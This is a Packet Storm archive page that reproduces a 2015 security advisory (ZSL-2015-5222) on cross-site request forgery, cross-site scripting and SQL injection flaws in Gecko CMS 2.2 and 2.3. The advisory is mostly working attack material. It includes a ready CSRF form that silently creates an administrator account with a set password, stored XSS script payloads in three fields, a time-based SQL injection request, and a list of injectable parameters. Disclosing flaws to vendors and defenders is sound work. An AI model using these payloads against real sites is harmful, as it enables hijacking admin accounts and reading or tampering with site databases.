exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Gecko CMS 2.2 / 2.3 CSRF / XSS / SQL Injection

Gecko CMS 2.2 / 2.3 CSRF / XSS / SQL Injection
Posted Jan 13, 2015
Authored by LiquidWorm | Site zeroscience.mk

Gecko CMS versions 2.2 and 2.3 suffer from cross site request forgery, cross site scripting, and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, xss, sql injection, csrf
SHA-256 | 641924170b5fe97cd5206e6af2553f0f88558b8ee8f4c7c4992e6781afd735d2

Gecko CMS 2.2 / 2.3 CSRF / XSS / SQL Injection

Change Mirror Download

Gecko CMS 2.3 Multiple Vulnerabilities


Vendor: JAKWEB
Product web page: http://www.cmsgecko.com
Affected version: 2.3 and 2.2

Summary: Gecko CMS is the way to go, forget complicated, bloated
and slow content management systems, Gecko CMS has been build to
be intuitive, easy to use, extendable to almost anything, running
on all standard web hosting (PHP and one MySQL database, Apache is
a plus), browser compatibility and fast, super fast!

Desc: Gecko CMS suffers from multiple vulnerabilities including
Cross-Site Request Forgery, Stored and Reflected Cross-Site Scripting
and SQL Injection.

Tested on: Apache/2
PHP/5.4.36


Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2015-5222
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5222.php


27.12.2014

---


CSRF Add Admin:
===============

<html>
<body>
<form action="http://demo.cmsgecko.com/admin/index.php?p=user&sp=newuser" method="POST">
<input type="hidden" name="jak_name" value="Testingus2" />
<input type="hidden" name="jak_email" value="test2@test.test" />
<input type="hidden" name="jak_username" value="Testusername2" />
<input type="hidden" name="jak_usergroup" value="3" />
<input type="hidden" name="jak_access" value="1" />
<input type="hidden" name="jak_password" value="123123" />
<input type="hidden" name="jak_confirm_password" value="123123" />
<input type="hidden" name="save" value="" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>

usergroup 4 = moderator
3 = administrator
2 = member standard
1 = guest
5 = banned



Stored XSS (params: jak_img, jak_name, jak_url):
================================================

POST http://demo.cmsgecko.com/admin/index.php?p=categories&sp=newcat HTTP/1.1

jak_catparent 0
jak_catparent2 0
jak_footer 1
jak_img "><script>alert(1);</script>
jak_lcontent <p>test</p>
jak_lcontent2
jak_menu 1
jak_name "><script>alert(2);</script>
jak_name2
jak_url "><script>alert(3);</script>
jak_varname ZSL
save



SQL Injection (params: jak_delete_log[], ssp):
==============================================

POST /admin/index.php?p=logs&sp=s HTTP/1.1

delete=&jak_delete_log%5B%5D=4%20and%20benchmark(20000000%2csha1(1))--%20&jak_delete_log%5B%5D=2&jak_delete_log%5B%5D=1

--

GET /admin/index.php?p=logs&sp=delete&ssp=3[SQLi] HTTP/1.1



Reflected XSS:
==============

/admin/index.php [horder%5B%5D parameter]
/admin/index.php [jak_catid parameter]
/admin/index.php [jak_content parameter]
/admin/index.php [jak_css parameter]
/admin/index.php [jak_delete_log%5B%5D parameter]
/admin/index.php [jak_email parameter]
/admin/index.php [jak_extfile parameter]
/admin/index.php [jak_file parameter]
/admin/index.php [jak_hookshow%5B%5D parameter]
/admin/index.php [jak_img parameter]
/admin/index.php [jak_javascript parameter]
/admin/index.php [jak_lcontent parameter]
/admin/index.php [jak_name parameter]
/admin/index.php [jak_password parameter]
/admin/index.php [jak_showcontact parameter]
/admin/index.php [jak_tags parameter]
/admin/index.php [jak_title parameter]
/admin/index.php [jak_url parameter]
/admin/index.php [jak_username parameter]
/admin/index.php [real_hook_id%5B%5D parameter]
/admin/index.php [sp parameter]
/admin/index.php [sreal_plugin_id%5B%5D parameter]
/admin/index.php [ssp parameter]
/admin/index.php [sssp parameter]
/js/editor/plugins/filemanager/dialog.php [editor parameter]
/js/editor/plugins/filemanager/dialog.php [field_id parameter]
/js/editor/plugins/filemanager/dialog.php [fldr parameter]
/js/editor/plugins/filemanager/dialog.php [lang parameter]
/js/editor/plugins/filemanager/dialog.php [popup parameter]
/js/editor/plugins/filemanager/dialog.php [subfolder parameter]
/js/editor/plugins/filemanager/dialog.php [type parameter]
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close